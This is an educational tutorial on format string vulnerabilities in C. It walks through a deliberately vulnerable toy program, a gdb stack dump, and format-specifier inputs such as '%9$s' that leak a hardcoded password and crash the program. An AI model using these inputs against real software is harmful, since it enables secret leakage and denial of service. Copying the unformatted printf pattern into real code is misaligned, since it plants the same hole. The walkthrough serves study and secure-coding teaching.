How to exploit format string vulnerabilities
In the previous articles, we discussed printing functions, format strings and format string vulnerabilities. This article provides an overview of how format string vulnerabilities can be exploited.
In this article, we will begin by solving a simple challenge to leak a secret from memory. In the next article, we will discuss another example, where we will chain a format string vulnerability and Buffer Overflow vulnerability to create better impact.
Learn Secure Coding
How can format string vulnerabilities be exploited?
As mentioned in the previous article, the following are some of the attacks possible using format string vulnerabilities.
- Leaking secrets
- Denial of Service
- Leaking memory addresses
- Overwriting memory addresses
In this article, let us discuss the first two items.
Leaking secrets from stack
Following is the vulnerable program we will use to understand the approach to exploit a simple format string vulnerability to be able to read data from memory.
int main(int argc, char *argv[]){
char *secret = "p@ssw0rD";
printf(argv[1]);
}As we can notice, the program is vulnerable to format string vulnerability since the printf function receives user input and prints it. It should be noted that there is no format specifier used in the printf function thus leaving the program vulnerable.
Let us run the program using gdb, check the disassembly of the main function and set up a breakpoint at the address of printf call.
gef➤ disass main
Dump of assembler code for function main:
0x0000000000401136 <+0>: endbr64
0x000000000040113a <+4>: push rbp
0x000000000040113b <+5>: mov rbp,rsp
0x000000000040113e <+8>: sub rsp,0x20
0x0000000000401142 <+12>: mov DWORD PTR [rbp-0x14],edi
0x0000000000401145 <+15>: mov QWORD PTR [rbp-0x20],rsi
0x0000000000401149 <+19>: lea rax,[rip+0xeb4] # 0x402004
0x0000000000401150 <+26>: mov QWORD PTR [rbp-0x8],rax
0x0000000000401154 <+30>: mov rax,QWORD PTR [rbp-0x20]
0x0000000000401158 <+34>: add rax,0x8
0x000000000040115c <+38>: mov rax,QWORD PTR [rax]
0x000000000040115f <+41>: mov rdi,rax
0x0000000000401162 <+44>: mov eax,0x0
0x0000000000401167 <+49>: call 0x401040 <printf@plt>
0x000000000040116c <+54>: mov eax,0x0
0x0000000000401171 <+59>: leave
0x0000000000401172 <+60>: ret
End of assembler dump.
gef➤
gef➤ b *0x0000000000401167
gef➤ runAs we can see in the preceding excerpt, we have started the program and the breakpoint should hit.
If the breakpoint is hit, that means we are about to execute the printf function. If we examine the stack at this point of time, we should notice the address of the string p@ssw0rD on the stack as highlighted below.
0x00007fffffffdf40│+0x0000: 0x00007fffffffe058 → 0x00007fffffffe380
0x00007fffffffdf48│+0x0008: 0x0000000100401050
0x00007fffffffdf50│+0x0010: 0x00007fffffffe050 → 0x0000000000000001
0x00007fffffffdf58│+0x0018: 0x0000000000402004 → "p@ssw0rD"
0x00007fffffffdf60│+0x0020: 0x0000000000000000 ← $rbp
0x00007fffffffdf68│+0x0028: 0x00007ffff7ded0b3 → <__libc_start_main+243> mov edi, eax
0x00007fffffffdf70│+0x0030: 0x00007ffff7ffc620 → 0x0005043700000000
0x00007fffffffdf78│+0x0038: 0x00007fffffffe058 → 0x00007fffffffe380 →As we can see in the preceding excerpt, there is an address (0x0000000000402004) on the stack, which is pointing to the string "p@ssw0rD".
Our objective is to leak this string using the format string vulnerability existing in the vulnerable program.
Let us pass multiple %llx strings as user input separated by a colon. %llx is to print long hex values since we are working on a 64-bit processor.
The output looks as follows.
As we can notice in the preceding output, the address 402004 is leaked. This is the same address we noticed on the stack earlier. This means, we are able to leak the address of the string p@ssw0rD.
We specified multiple %llx strings to be able to dump the address and the rest of the entries dumped from the stack are not useful for us. So, we can choose to dump only the address that we want by using Direct Parameter Access. This can be done by specifying the distance at which the address is printed. In this case, the 9th value is the address. We can use %9$11x to directly access this address. This looks as follows.
402004
$As we can notice, we managed to leak just the address that we wanted. However, we have leaked the address and not the actual string value. To be able to leak the actual string instead of the address, we can use %9$11s. This will ask the printf function to print the value pointed by the 9th position on the stack. This looks as follows.
p@ssw0rD
$We managed to successfully leak the secret string from the stack by using a format string vulnerability in the target binary.
Crashing the program
In the previous section, we used %9$s as our format specifier and dumped the secret string from the stack. This technique worked because 9th value is a valid address that is pointing to our secret string.
If we try to access an invalid memory location in a similar fashion, that will cause a segmentation fault leading to crashing the program. The following excerpt shows that accessing the 7th position on the stack to print a string value pointed by the address causes a segmentation fault since the address is invalid.
Segmentation fault (core dumped)
$The crash occurred because the value at the 7th position may not be a valid address. Rather, it could be an address from kernel space or non-address value such as a simple integer or character.
These two examples clearly show how format string vulnerabilities can be used to leak memory and crash the program.
Conclusion
Format String vulnerabilities clearly can create great damage, when exploited. One can easily read data from arbitrary memory locations and even crash the applications using them. The impact can be more if these vulnerabilities are chained with other vulnerabilities such as buffer overflow. In the next article, we will discuss how one can chain format string vulnerabilities and buffer overflows to bypass memory protections such as stack canaries.
Learn Secure Coding